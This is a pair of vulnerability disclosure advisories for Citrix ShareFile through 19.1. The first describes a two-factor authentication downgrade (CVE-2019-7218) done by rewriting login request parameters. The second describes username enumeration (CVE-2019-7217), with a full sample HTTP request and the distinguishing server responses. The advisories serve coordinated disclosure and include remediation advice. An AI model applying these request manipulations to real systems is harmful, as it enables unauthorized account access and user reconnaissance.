CVE 2019-7218: CITRIX SHAREFILE TWO FACTOR AUTHENTICATION DOWNGRADE TO ONE FACTOR

Author: Armando Huesca Prida

Summary:

An attacker with access to the offline victim’s otp physical token or virtual app (like google authenticator) is able to bypass the first authentication phase (username/password mechanism) and log-in using username/otp combination only (phase 2 of 2FA).

Tested Versions: Citrix ShareFile through 19.1

Product URL: https://www.sharefile.com/

CVE-ID: CVE-2019-7218

Details:

An attacker with access to the offline victim’s otp physical token or virtual app (like google authenticator) is able to bypass the first authentication phase (username/password mechanism) and log-in using username/otp combination only (phase 2 of 2FA). This way, it is possible to downgrade 2FA to 1FA, without knowing the victim’s password.

In order to exploit this vulnerability, attackers should have access to the offline otp token (physical or virtual): it is not possible to gain access if the otp is generated after the phase 1 authentication and sent to the client via SMS or phone call.

This vulnerability takes place because the server does not control that client’s phase 1 authentication succeeded before validating phase 2 authentication (authentication schema).

Example:

An attacker is able to intercept the log-in request with garbage data and use this request as base for the attack, changing the op and password parameters as follows:

Figure 1 - phase 1 default log-in request and response

Request modifications:

change op=webflow-auth with op=webflow-verify
change password=* with code=[OTP]

In case that the username/otp combination is correct (phase 2 succeeded), phase 1 authentication is bypassed and unauthorized access to the application is gained by the attacker as shown below:

Figure 2 - Evil phase 2 request with modified parameters

Follows the proof of unathorized access to the web application by exploiting this vulnerability.

Figure 3 - Unauthorized access to the application

Advice:

Make sure that client’s phase 1 authentication succeeded before validating phase 2 authentication.

Timeline:

28-01-2019 Vendor disclosure
05-02-2019 Acknoledge from vendor
02-05-2019 Public Release

Credit:

Discovered by Andrea Pessione and Armando Huesca of SKIT Cyber Security

CVE 2019-7217: CITRIX SHAREFILE USER ENUMERATION

 

Author: Armando Huesca Prida

Summary:

It is possible to enumerate application username based on different server responses using the request to check the otp code. No authentication is required.

Tested Versions: Citrix ShareFile through 19.1

Product URL: https://www.sharefile.com/

CVE-ID: CVE-2019-7217

Details:

It is possible to enumerate application username based on different server responses using the request to check the otp code. No authentication is required.

Following an example of HTTP request:

POST /oauth/oauthapi.aspx HTTP/1.1

Host: xxx.sharefile.eu

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: https://xxx.sharefile.eu/Authentication/Login

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Content-Length: 293

Connection: close

tool=oauth-webpop&fmt=json&op=webflow-verify&username=asd1%40test.com&subdomain=xxx&response_type=code&

client_id=Dzi4UPUAg5l8beKdioecdcnmHUTWWln6&state=FxwxORudhXUqUh3phnC6Mg%3D%3D&

redirect_uri=https%3A%2F%2Fxxx.sharefile.eu%2Flogin%2Foauthlogin&h=&requireV3=false&code=123

Response if username is not correct:

{"error":true,"errorMessage":"You are not authorized to use this client","errorCode":126}

Response if username is correct:

{"error":true,"errorMessage":"Unable to verify two factor code.","errorCode":122}

Timeline:

22-01-2019 Vendor disclosure
05-02-2019 Acknoledge from vendor
02-05-2019 Public Release

Credit:

Discovered by Armando Huesca and Andrea Pessione of SKIT Cyber Security